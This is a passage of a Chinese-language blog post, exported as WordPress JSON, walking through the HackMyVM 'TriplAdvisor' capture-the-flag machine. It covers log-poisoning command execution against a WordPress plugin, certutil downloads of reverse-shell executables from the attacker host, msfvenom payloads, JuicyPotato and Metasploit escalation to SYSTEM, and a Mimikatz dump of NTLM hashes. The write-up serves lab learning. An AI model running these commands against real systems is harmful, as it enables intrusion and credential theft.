\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 504 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 736 "-" "curl\/8.8.0"\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 968 "-" "curl\/8.8.0"\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] "GET \/ HTTP\/1.1" 302 - "-" "curl\/8.10.1"\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1" 200 1288 "-" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] "GET \/wordpress\/ HTTP\/1.1" 200 22542 "-" "**** Online ****\n 0000 ...\n 1c00\nCertUtil: -URLCache command completed successfully.\n"\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] "POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1" 200 - "http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000" "WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress"\n192.168.10.101 - - [04\/Jun\/2025:15:08:35 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=dir HTTP\/1.1" 200 2754 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:15:40:23 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/revshell.exe+C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 200 2326 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:15:43:49 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 500 1640 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:15:45:59 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 500 1640 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:16:04:32 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 200 3129 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:16:08:24 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 200 3405 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:16:11:23 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 500 1640 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:16:36:03 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 500 1640 "-" "curl\/8.5.0"\n{"success":true,"data":{"output":[]}} \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=C:\\Windows\\Temp\\pentest.exe" \n<\/code><\/pre>\nmsf\u63d0\u6743<\/h3>\n
\u53d1\u73b0\u670d\u52a1\u5668\u7684\u578b\u53f7\u548c\u91cc\u9762\u5bf9\u5e94\u4e0a\u4e86Windows Server 2008 R2 (6.1 Build 7600).<\/code>\uff0c\u770b\u5e08\u5085\u4eec\u7684\u535a\u5ba2\u4f3c\u4e4e\u8bf4SeImpersonatePrivilege<\/code>\u6743\u9650\u53ef\u4ee5\u4f7f\u7528JuicyPotato<\/code>\u8fdb\u884c\u63d0\u6743\uff0c\u8bd5\u4e00\u4e0bmsf\uff1a<\/p>\nmsf6 post(multi\/recon\/local_exploit_suggester) > use exploit\/windows\/local\/ms16_075_reflection_juicy\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > options\n\nModule options (exploit\/windows\/local\/ms16_075_reflection_juicy):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n CLSID {4991d34b-80a1-4291-83b6-3328366b9097} yes Set CLSID value of the DCOM to trigger\n SESSION yes The session to run this module on\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n EXITFUNC none yes Exit technique (Accepted: '', seh, thread, process, none)\n LHOST 10.0.2.4 yes The listen address (an interface may be specified)\n LPORT 4444 yes The listen port\n\nExploit target:\n\n Id Name\n -- ----\n 0 Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > set session 1\nsession => 1\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > set lhost 192.168.10.101\nlhost => 192.168.10.101\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > set lport 2345\nlport => 2345\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > run\n\n[*] Started reverse TCP handler on 192.168.10.101:2345 \n[+] Target appears to be vulnerable (Windows 2008 R2)\n[*] Launching notepad to host the exploit...\n[+] Process 3052 launched.\n[*] Reflectively injecting the exploit DLL into 3052...\n[*] Injecting exploit into 3052...\n[*] Exploit injected. Injecting exploit configuration into 3052...\n[*] Configuration injected. Executing exploit...\n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\n[*] Sending stage (176198 bytes) to 192.168.10.103\n[*] Meterpreter session 2 opened (192.168.10.101:2345 -> 192.168.10.103:49190) at 2025-06-04 04:08:37 -0400\n\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM\nmeterpreter > shell\nProcess 2580 created.\nChannel 1 created.\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>cd c:\/users\/administrator\/desktop\ncd c:\/users\/administrator\/desktop\n\nc:\\Users\\Administrator\\Desktop>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\Administrator\\Desktop\n\n08\/15\/2024 09:02 PM <DIR> .\n08\/15\/2024 09:02 PM <DIR> ..\n06\/30\/2024 10:10 AM 33 root.txt\n 1 File(s) 33 bytes\n 2 Dir(s) 23,797,780,480 bytes free\n\nc:\\Users\\Administrator\\Desktop>type root.txt\ntype root.txt\n5b38df6802c305e752c8f02358721acc<\/code><\/pre>\n\u63d0\u6743\u6210\u529f\u3002<\/p>\n
JuicyPotato\u63d0\u6743<\/h3>\n
\u5982\u679c\u4e0d\u4f7f\u7528msf\u7684\u8bdd\uff0c\u9700\u8981\u4f7f\u7528\u4e00\u4e9b\u76f8\u5173\u5de5\u5177\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
\n\n- https:\/\/github.com\/ohpe\/juicy-potato\/releases\/download\/v0.1\/JuicyPotato.exe<\/a><\/li>\n<\/ul>\n<\/blockquote>\n
\u5de5\u5177\u7684\u4f7f\u7528\u5177\u4f53\u53c2\u8003\uff1ahttps:\/\/ohpe.it\/juicy-potato\/<\/a><\/p>\n\u8ddf\u7740ta0\u795e<\/a>\u505a\u5c31\u5b8c\u4e86\uff1a<\/p>\n<\/div><\/p>\n<\/div><\/p>\n<\/div><\/p>\n\u627e\u5230\u6211\u4eec\u60f3\u8981\u7684\uff0c\u7136\u540e\u4e0b\u5230\u9776\u673a\u4e0a\uff1a<\/p>\n
\n\n- https:\/\/github.com\/ohpe\/juicy-potato\/blob\/master\/CLSID\/Windows_Server_2008_R2_Enterprise\/CLSID.list<\/a><\/li>\n
- https:\/\/ohpe.it\/juicy-potato\/Test\/test_clsid.bat<\/a><\/li>\n<\/ul>\n<\/blockquote>\n
\u8fd9\u91cc\u4e0d\u884c\u5c31\u91cd\u542f\u4e86\u4e00\u4e0b\u9776\u673a\u3002\u3002\u8fd9\u91cc\u6ce8\u610f\u4e0d\u8981\u4e0b\u8f7d\u5230temp\u76ee\u5f55\uff0c\u597d\u50cf\u6267\u884c\u4e0d\u4e86\u3002\u3002<\/p>\n
\u9996\u5148\u4e0b\u8f7d\u76f8\u5173\u7684\u6d4b\u8bd5\u811a\u672c<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 1234\nlistening on [any] 1234 ...\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49190\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes>cd c:\/users\ncd c:\/users\n\nc:\\Users>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\n\n06\/29\/2024 01:26 PM <DIR> .\n06\/29\/2024 01:26 PM <DIR> ..\n06\/29\/2024 08:09 PM <DIR> Administrator\n07\/13\/2009 09:52 PM <DIR> Public\n06\/29\/2024 08:11 PM <DIR> websvc\n 0 File(s) 0 bytes\n 5 Dir(s) 23,796,097,024 bytes free\n\nc:\\Users>cd websvc\/desktop\ncd websvc\/desktop\n\nc:\\Users\\websvc\\Desktop>certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/CLSID.list\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/CLSID.list\n**** Online ****\n 0000 ...\n 37c2\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop>certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/JuicyPotato.exe\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/JuicyPotato.exe\n**** Online ****\n 000000 ...\n 054e00\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop>certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/test_clsid.bat\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/test_clsid.bat\n**** Online ****\n 0000 ...\n 011d\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop>test_clsid.bat\ntest_clsid.bat\n{72A7994A-3092-4054-B6BE-08FF81AEEFFC} 10000\n{84D586C4-A423-11D2-B943-00C04F79D22F} 10000\n{b8f87e75-d1d5-446b-931c-3f61b97bca7a} 10000\n{4D111E08-CBF7-4f12-A926-2C7920AF52FC} 10000\n{3B35075C-01ED-45bc-9999-DC2BBDEAC171} 10000\n{228fb8f7-fb53-4fd5-8c7b-ff59de606c5b} 10000\n{01D0A625-782D-4777-8D4E-547E6457FAD5} 10000\n{4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} 10000\n{010911E2-F61C-479B-B08C-43E6D1299EFE} 10000\n{2b72133b-3f5b-4602-8952-803546ce3344} 10000\n{86d5eb8a-859f-4c7b-a76b-2bd819b7a850} 10000\n{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B} 10000\n{3be9934e-4d1f-4e31-8bc3-8efc710ee0f2} 10000\n{87BB326B-E4A0-4de1-94F0-B9F41D0C6059} 10000\n{E6442437-6C68-4f52-94DD-2CFED267EFB9} 10000\n{6d8ff8e0-730d-11d4-bf42-00b0d0118b56} 10000\n{853c9738-9e98-45af-aef4-dc0c6237b388} 10000\n------------------------\n\nc:\\Users\\websvc\\Desktop>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\websvc\\Desktop\n\n06\/04\/2025 05:48 PM <DIR> .\n06\/04\/2025 05:48 PM <DIR> ..\n06\/04\/2025 05:47 PM 14,274 CLSID.list\n06\/04\/2025 05:47 PM 347,648 JuicyPotato.exe\n06\/04\/2025 05:56 PM 1,101 result.log\n06\/04\/2025 05:48 PM 285 test_clsid.bat\n06\/30\/2024 10:10 AM 33 user.txt\n 5 File(s) 363,341 bytes\n 2 Dir(s) 23,792,906,240 bytes free\n\nc:\\Users\\websvc\\Desktop>type result.log\ntype result.log\n{9678f47f-2435-475c-b24a-4606f8161c16};TRIPLADVISOR\\websvc\n{98068995-54d2-4136-9bc9-6dbcb0a4683f};TRIPLADVISOR\\websvc\n{0289a7c5-91bf-4547-81ae-fec91a89dec5};TRIPLADVISOR\\websvc\n{9acf41ed-d457-4cc1-941b-ab02c26e4686};TRIPLADVISOR\\websvc\n{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\\SYSTEM\n{69AD4AEE-51BE-439b-A92C-86AE490E8B30};NT AUTHORITY\\SYSTEM\n{F087771F-D74F-4C1A-BB8A-E16ACA9124EA};NT AUTHORITY\\SYSTEM\n{6d18ad12-bde3-4393-b311-099c346e6df9};NT AUTHORITY\\SYSTEM\n{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\\SYSTEM\n{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\\LOCAL SERVICE\n{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\\LOCAL SERVICE\n{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\\LOCAL SERVICE\n{8F5DF053-3013-4dd8-B5F4-88214E81C0CF};NT AUTHORITY\\SYSTEM\n{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\\SYSTEM\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n{8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\\SYSTEM\n{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\\SYSTEM\n{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\\SYSTEM\n# \u8fd9\u91cc\u7684\u6bcf\u4e2aNT AUTHORITY\\SYSTEM\u90fd\u662f\u53ef\u4ee5\u7528\u7684<\/code><\/pre>\n\u7136\u540e\u5229\u7528\u76f8\u5173\u5de5\u5177\u63d0\u6743\uff1a<\/p>\n
c:\\Users\\websvc\\Desktop>JuicyPotato.exe\nJuicyPotato.exe\nJuicyPotato v0.1 \n\nMandatory args: \n-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both\n-p <program>: program to launch\n-l <port>: COM server listen port\n\nOptional args: \n-m <ip>: COM server listen address (default 127.0.0.1)\n-a <argument>: command line argument to pass to program (default NULL)\n-k <ip>: RPC server ip address (default 127.0.0.1)\n-n <port>: RPC server listen port (default 135)\n-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})\n-z only test CLSID and print token's user\n\nc:\\Users\\websvc\\Desktop>JuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nJuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nTesting {C49E32C6-BC8B-11d2-85D4-00105A1F8304} 2345\n....\n[+] authresult 0\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK\n\nc:\\Users\\websvc\\Desktop>JuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revrootshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nJuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revrootshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\n# \u8fd9\u91cc\u8fd9\u4e2a-l\u5e94\u8be5\u662f\u4e00\u4e2a\u8f6c\u63a5\u7aef\u53e3\uff0c\u9009\u4e00\u4e2a\u4e0d\u5e38\u7528\u7684\u5c31\u884c\nTesting {C49E32C6-BC8B-11d2-85D4-00105A1F8304} 2345\n....\n[+] authresult 0\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK<\/code><\/pre>\n\u8fd9\u91cc\u662f\u4e2d\u95f4\u8fdb\u884c\u4e0b\u8f7d\u7684\u8bb0\u5f55\u4ee5\u53ca\u65b0\u53cd\u5f39shell\u7684\u751f\u6210\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ ll \ntotal 392\n-rw-r--r-- 1 kali kali 2246 Jun 4 00:59 44340.txt\n-rw-r--r-- 1 kali kali 14274 Jun 4 04:41 CLSID.list\n-rw-r--r-- 1 kali kali 347648 Dec 6 2021 JuicyPotato.exe\n-rw-r--r-- 1 kali kali 7168 Jun 4 03:48 pentest.exe\ndrwxr-xr-x 3 root root 4096 Jun 4 00:14 reports\n-rw-r--r-- 1 kali kali 87 Jun 4 00:51 reports.json\ndrwxr-xr-x 3 kali kali 4096 Jun 4 00:51 Result\n-rw-r--r-- 1 kali kali 7168 Jun 4 02:28 revshell.exe\n-rw-r--r-- 1 kali kali 285 Jun 4 04:41 test_clsid.bat\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 04:43:33] "GET \/revshell.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:43:33] "GET \/revshell.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:09] "GET \/CLSID.list HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:09] "GET \/CLSID.list HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:34] "GET \/JuicyPotato.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:34] "GET \/JuicyPotato.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:53] "GET \/test_clsid.bat HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:53] "GET \/test_clsid.bat HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:00:39] "GET \/revshell.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:00:42] "GET \/revshell.exe HTTP\/1.1" 200 -\n^C\n[!] Exiting!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom --payload windows\/x64\/shell_reverse_tcp LHOST=192.168.10.101 LPORT=2345 -f exe -o revrootshell.exe \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of exe file: 7168 bytes\nSaved as: revrootshell.exe\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888 \n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 05:09:56] "GET \/revrootshell.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:09:56] "GET \/revrootshell.exe HTTP\/1.1" 200 -\n^C\n[!] Exiting!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 2345\nlistening on [any] 2345 ...\nwhoami\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49636\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami\nnt authority\\system\n\nC:\\Windows\\system32><\/code><\/pre>\n\u6700\u540e\u5f97\u5230\u4e86rootshell\uff01<\/p>\n
\u7968\u636e\u7684\u5229\u7528<\/h2>\n
\u8fd9\u91cc\u5c31\u83b7\u53d6rootflag\u6765\u8bf4\u5df2\u7ecf\u7ed3\u675f\u4e86\uff0c\u4f46\u662f\u8fd8\u53ef\u4ee5\u6709\u65b0\u7684\u62d3\u5c55\uff0c\u5177\u4f53\u53ef\u4ee5\u53c2\u8003\u8fd9\u4e2a\u5e08\u5085\u8bf4\u7684https:\/\/www.linuxsec.org\/2024\/10\/hackmyvm-tripladvisor-writeup.html \uff0c\u8fd9\u91cc\u4ec5\u590d\u73b0\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n
\u4f7f\u7528 Mimikatz<\/code> \u8fdb\u884c\u63d0\u53d6\uff0c\u7136\u540e\u8fdb\u884c\u5229\u7528impacket-psexec<\/code>\u8fdb\u884c\u767b\u5f55<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 2345\nlistening on [any] 2345 ...\nwhoami\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49636\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami\nnt authority\\system\n\nC:\\Windows\\system32>cd c:\\Users\\websvc\\Desktop\ncd c:\\Users\\websvc\\Desktop\n\nc:\\Users\\websvc\\Desktop>certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/mimikatz.exe\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/mimikatz.exe\n**** Online ****\n 000000 ...\n 131308\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop>mimikatz.exe privilege::debug token::elevate lsadump::sam exit\nmimikatz.exe privilege::debug token::elevate lsadump::sam exit\n\n .#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36\n .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)\n ## \/ \\ ## \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ## > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com ***\/\n\nmimikatz(commandline) # privilege::debug\nPrivilege '20' OK\n\nmimikatz(commandline) # token::elevate\nToken Id : 0\nUser name : \nSID name : NT AUTHORITY\\SYSTEM\n\n236 {0;000003e7} 0 D 7912 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,30p) Primary\n -> Impersonated !\n * Process Token : {0;000003e7} 0 D 655950 NT AUTHORITY\\SYSTEM S-1-5-18 (23g,27p) Primary\n * Thread Token : {0;000003e7} 0 D 663742 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,30p) Impersonation (Delegation)\n\nmimikatz(commandline) # lsadump::sam\nDomain : TRIPLADVISOR\nSysKey : 129514b2fa60646a00037e4df6fc3d3f\nLocal SID : S-1-5-21-2621822639-2474692399-1676906194\n\nSAMKey : d8c54e5c64e72b5baade016eaca4eea6\n\nRID : 000001f4 (500)\nUser : Administrator\n Hash NTLM: 2176416a80e4f62804f101d3a55d6c93\n\nRID : 000001f5 (501)\nUser : Guest\n\nRID : 000003eb (1003)\nUser : websvc\n Hash NTLM: b0a913673f4f8d5debc49f8fcbbdbb68\n\nmimikatz(commandline) # exit\nBye!<\/code><\/pre>\n<\/div><\/p>\n","protected":false},"excerpt":{"rendered":"TriplAdvisor \u8fd9\u91cc\u9776\u673a\u662f\u4ec5\u4e3b\u673a\uff0c\u6839\u636e\u81ea\u5df1\u7684\u60c5\u51b5\u8fdb\u884c\u4fee\u6539\uff1a \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80k […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-830","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=830"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830\/revisions"}],"predecessor-version":[{"id":831,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830\/revisions\/831"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=830"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20250604144106404\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737266.png\")
<\/div><\/p>\n![\"image-20250604144537941\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737267.png\")
<\/div>![\"image-20250604144710481\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737268.png\")
<\/div><\/p>\n![\"image-20250604162241702\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737269.png\")
<\/div><\/p>\n![\"image-20250604162406765\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737270.png\")
<\/div><\/p>\n![\"image-20250604162432905\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737271.png\")
<\/div><\/p>\n![\"image-20250604173636415\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737272.png\")
<\/div><\/p>\n","protected":false},"excerpt":{"rendered":"